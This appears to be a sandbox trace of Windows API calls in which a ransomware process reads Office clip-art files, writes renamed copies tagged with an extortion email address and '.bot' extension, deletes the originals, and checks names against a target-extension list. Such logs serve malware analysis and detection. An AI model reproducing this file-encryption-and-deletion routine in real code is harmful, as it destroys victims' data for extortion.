	[0163.688] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3c68, lpOverlapped=0x0) returned 1
	[0163.773] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3c70, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3c70, lpOverlapped=0x0) returned 1
	[0163.774] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.774] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.775] SetEndOfFile (hFile=0x1d8) returned 1
	[0163.775] CloseHandle (hObject=0x1d8) returned 1
	[0163.775] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.775] SetEndOfFile (hFile=0x3c4) returned 1
	[0163.777] CloseHandle (hObject=0x3c4) returned 1
	[0163.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.778] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151045.wmf")) returned 1
	[0163.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.779] lstrlenW (lpString=".doc") returned 4
	[0163.779] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.779] lstrlenW (lpString=".docx") returned 5
	[0163.779] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0163.779] lstrlenW (lpString=".pdf") returned 4
	[0163.779] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.779] lstrlenW (lpString=".xls") returned 4
	[0163.779] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.779] lstrlenW (lpString=".xlsx") returned 5
	[0163.779] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0163.779] lstrlenW (lpString=".ppt") returned 4
	[0163.779] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.779] lstrlenW (lpString=".zip") returned 4
	[0163.779] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.779] lstrlenW (lpString=".rar") returned 4
	[0163.779] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.779] lstrlenW (lpString=".bz2") returned 4
	[0163.779] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.779] lstrlenW (lpString=".7z") returned 3
	[0163.779] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.779] lstrlenW (lpString=".dbf") returned 4
	[0163.779] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.779] lstrlenW (lpString=".1cd") returned 4
	[0163.779] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.780] lstrlenW (lpString=".jpg") returned 4
	[0163.780] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.780] lstrlenW (lpString=".doc") returned 4
	[0163.780] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.780] lstrlenW (lpString=".docx") returned 5
	[0163.780] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0163.780] lstrlenW (lpString=".pdf") returned 4
	[0163.780] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.780] lstrlenW (lpString=".xls") returned 4
	[0163.780] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.780] lstrlenW (lpString=".xlsx") returned 5
	[0163.780] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0163.780] lstrlenW (lpString=".ppt") returned 4
	[0163.780] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.780] lstrlenW (lpString=".zip") returned 4
	[0163.780] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.780] lstrlenW (lpString=".rar") returned 4
	[0163.780] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.780] lstrlenW (lpString=".bz2") returned 4
	[0163.780] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.780] lstrlenW (lpString=".7z") returned 3
	[0163.780] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.780] lstrlenW (lpString=".dbf") returned 4
	[0163.780] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.780] lstrlenW (lpString=".1cd") returned 4
	[0163.780] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.780] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned 63
	[0163.780] lstrlenW (lpString=".jpg") returned 4
	[0163.780] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.781] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.781] lstrlenW (lpString="J0151047.WMF") returned 12
	[0163.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151047.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.781] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=18500) returned 1
	[0163.781] CloseHandle (hObject=0x3c4) returned 1
	[0163.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151047.wmf")) returned 0x20
	[0163.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151047.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151047.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0163.782] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.782] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151047.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0163.783] GetLastError () returned 0x0
	[0163.783] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x4844, lpOverlapped=0x0) returned 1
	[0163.784] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x4850, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x4850, lpOverlapped=0x0) returned 1
	[0163.785] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.786] WriteFile (in: hFile=0x1d8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.786] SetEndOfFile (hFile=0x1d8) returned 1
	[0163.786] CloseHandle (hObject=0x1d8) returned 1
	[0163.786] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.786] SetEndOfFile (hFile=0x3c4) returned 1
	[0163.788] CloseHandle (hObject=0x3c4) returned 1
	[0163.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.788] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151047.wmf")) returned 1
	[0163.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.789] lstrlenW (lpString=".doc") returned 4
	[0163.789] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.789] lstrlenW (lpString=".docx") returned 5
	[0163.789] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0163.789] lstrlenW (lpString=".pdf") returned 4
	[0163.789] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.789] lstrlenW (lpString=".xls") returned 4
	[0163.789] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.789] lstrlenW (lpString=".xlsx") returned 5
	[0163.789] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0163.789] lstrlenW (lpString=".ppt") returned 4
	[0163.789] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.789] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.789] lstrlenW (lpString=".zip") returned 4
	[0163.789] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.789] lstrlenW (lpString=".rar") returned 4
	[0163.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.789] lstrlenW (lpString=".bz2") returned 4
	[0163.789] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.790] lstrlenW (lpString=".7z") returned 3
	[0163.790] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.790] lstrlenW (lpString=".dbf") returned 4
	[0163.790] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.790] lstrlenW (lpString=".1cd") returned 4
	[0163.790] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.790] lstrlenW (lpString=".jpg") returned 4
	[0163.790] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.790] lstrlenW (lpString=".doc") returned 4
	[0163.790] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.790] lstrlenW (lpString=".docx") returned 5
	[0163.790] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0163.790] lstrlenW (lpString=".pdf") returned 4
	[0163.790] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.790] lstrlenW (lpString=".xls") returned 4
	[0163.790] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.790] lstrlenW (lpString=".xlsx") returned 5
	[0163.790] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0163.790] lstrlenW (lpString=".ppt") returned 4
	[0163.790] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.790] lstrlenW (lpString=".zip") returned 4
	[0163.790] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.790] lstrlenW (lpString=".rar") returned 4
	[0163.790] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.790] lstrlenW (lpString=".bz2") returned 4
	[0163.790] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.790] lstrlenW (lpString=".7z") returned 3
	[0163.791] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.791] lstrlenW (lpString=".dbf") returned 4
	[0163.791] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.791] lstrlenW (lpString=".1cd") returned 4
	[0163.791] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151047.WMF") returned 63
	[0163.791] lstrlenW (lpString=".jpg") returned 4
	[0163.791] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.791] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.791] lstrlenW (lpString="J0151055.WMF") returned 12
	[0163.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151055.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0164.103] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=14632) returned 1
	[0164.103] CloseHandle (hObject=0x3a4) returned 1
	[0164.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151055.wmf")) returned 0x20
	[0164.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151055.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151055.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.253] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.253] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151055.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0164.266] GetLastError () returned 0x0
	[0164.266] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x3928, lpOverlapped=0x0) returned 1
	[0164.319] WriteFile (in: hFile=0x1b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x3930, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x3930, lpOverlapped=0x0) returned 1
	[0164.320] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.320] WriteFile (in: hFile=0x1b4, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.320] SetEndOfFile (hFile=0x1b4) returned 1
	[0164.320] CloseHandle (hObject=0x1b4) returned 1
	[0164.320] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.320] SetEndOfFile (hFile=0x3a8) returned 1
	[0164.323] CloseHandle (hObject=0x3a8) returned 1
	[0164.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.324] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151055.wmf")) returned 1
	[0164.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.326] lstrlenW (lpString=".doc") returned 4
	[0164.326] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.326] lstrlenW (lpString=".docx") returned 5
	[0164.326] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0164.326] lstrlenW (lpString=".pdf") returned 4
	[0164.326] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.326] lstrlenW (lpString=".xls") returned 4
	[0164.326] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.326] lstrlenW (lpString=".xlsx") returned 5
	[0164.326] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0164.326] lstrlenW (lpString=".ppt") returned 4
	[0164.326] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.327] lstrlenW (lpString=".zip") returned 4
	[0164.327] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.327] lstrlenW (lpString=".rar") returned 4
	[0164.327] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.327] lstrlenW (lpString=".bz2") returned 4
	[0164.327] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.327] lstrlenW (lpString=".7z") returned 3
	[0164.327] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.327] lstrlenW (lpString=".dbf") returned 4
	[0164.327] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.327] lstrlenW (lpString=".1cd") returned 4
	[0164.327] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.327] lstrlenW (lpString=".jpg") returned 4
	[0164.327] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.327] lstrlenW (lpString=".doc") returned 4
	[0164.327] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.327] lstrlenW (lpString=".docx") returned 5
	[0164.327] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0164.327] lstrlenW (lpString=".pdf") returned 4
	[0164.327] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.327] lstrlenW (lpString=".xls") returned 4
	[0164.327] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.327] lstrlenW (lpString=".xlsx") returned 5
	[0164.327] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0164.327] lstrlenW (lpString=".ppt") returned 4
	[0164.327] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.327] lstrlenW (lpString=".zip") returned 4
	[0164.327] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.328] lstrlenW (lpString=".rar") returned 4
	[0164.328] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.328] lstrlenW (lpString=".bz2") returned 4
	[0164.328] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.328] lstrlenW (lpString=".7z") returned 3
	[0164.328] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.328] lstrlenW (lpString=".dbf") returned 4
	[0164.328] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.328] lstrlenW (lpString=".1cd") returned 4
	[0164.328] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151055.WMF") returned 63
	[0164.328] lstrlenW (lpString=".jpg") returned 4
	[0164.328] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.328] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.328] lstrlenW (lpString="J0151063.WMF") returned 12
	[0164.328] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151063.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.329] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=10632) returned 1
	[0164.329] CloseHandle (hObject=0x3a8) returned 1
	[0164.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151063.wmf")) returned 0x20
	[0164.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151063.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151063.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0164.329] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.329] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151063.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151063.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0164.330] GetLastError () returned 0x0
	[0164.330] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2988, lpOverlapped=0x0) returned 1
